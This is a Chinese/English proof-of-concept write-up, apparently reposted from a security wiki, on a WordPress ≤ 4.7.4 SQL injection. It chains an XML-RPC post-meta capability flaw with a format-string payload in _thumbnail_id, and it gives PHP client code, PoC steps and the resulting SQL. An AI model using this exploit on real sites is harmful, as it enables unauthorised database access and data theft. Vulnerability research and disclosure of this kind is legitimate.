Wordpress <= 4.7.4 XML-RPC API POST META 未校验漏洞












$usr = 'author';
$pwd = 'author';
$xmlrpc = 'http://local.target/xmlrpc.php';
$client = new IXR_Client($xmlrpc);
$content = array("ID" => 6, 'meta_input' => array("_thumbnail_id"=>"xxx"));
$res = $client->query('wp.editPost',0, $usr, $pwd, 6/*post_id*/, $content);


5 %1$%s hello






其中5 %1$%s hello的encode编码是5%20%251%24%25s%20hello这个请求将导致数据库执行以下查询(会有错误)

SELECT post_id FROM wp_postmeta WHERE meta_key = '_thumbnail_id' AND meta_value = '5 _thumbnail_id' hello'



In order to understand the writing here, you need to read the previous explanation https://medium.com/websec/wordpress-sqli-bbb2afcc8e94. If you got it, then we can jump to the part and solve the question e.g. how to update / insert our sql payload into _thumbnail_id post meta.

PoC start

  • Login to your wordpress as author
  • Upload image
  • Remember ID of the image / media
  • Create post and set image as featured image (this creates _thumbnail_id post meta)
  • Remember the post ID

Wordpress ≤ 4.7.4 XML-RPC

n case of appropriate wordpress version then we can use the third vulnerability in this versions of wordpress https://wordpress.org/news/2017/05/wordpress-4-7-5/ e.g.

Lack of capability checks for post meta data in the XML-RPC API.

This means that we can edit the value of _thumbnail_id with the following code ( 6 is the post ID and 5 is image/post ID )

$usr = 'author';
$pwd = 'author';
$xmlrpc = 'http://local.target/xmlrpc.php';
$client = new IXR_Client($xmlrpc);
$content = array("ID" => 6, 'meta_input' => array("_thumbnail_id"=>"5 %1$%s hello"));
$res = $client->query('wp.editPost',0, $usr, $pwd, 6/*post_id*/, $content);

and with this code we add the following payload in the DB 5 %1$%s hello

Wordpress importer plugin — any version of wordpress

This is another approach for changing the _thumbnail_id value in the database. If wordpress instance have enabled this plugin on it, then simple export, change meta value and import will do the job.

Execute the SQL payload

Login to the administration panel with your author account, go to media e.g. http://local.target/wp-admin/upload.php , grab the _wpnonce value and we are ready to prove our SQLi vulnerability. Issue the following request towards your local instance:


where 5%20%251%24%25s%20hello is url encoded 5 %1$%s hello. This request will result with execution of the following query against the DB (will rise error of course):

SELECT post_id FROM wp_postmeta WHERE meta_key = '_thumbnail_id' AND meta_value = '5 _thumbnail_id' hello'

This proves the SQLi vulnerability in the wordpress and as mention in previous post value after 5 %1$%s e.g. hello is our payload

Is this vulnerability dangerous?

SQL injection itself is quite dangerous vulnerability, but sometimes have its own limitations. Here at our case depending of the database server configuration or mysql client used on PHP side could be fatal, but in our case best case scenario would be blind sql injection. Sure, we all know the trivial attack vector, but here we have 2 facts that go against wordpress:

  • meta value database column type e.g. size constraint
  • media parameter could be POST parameter e.g. will have huge size

    This two facts guide us to the conclusion that even with blind sqli one query would be enough to calculate some crucial DB cell value.

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-12-23 00:18:46

results matching ""

    No results matching ""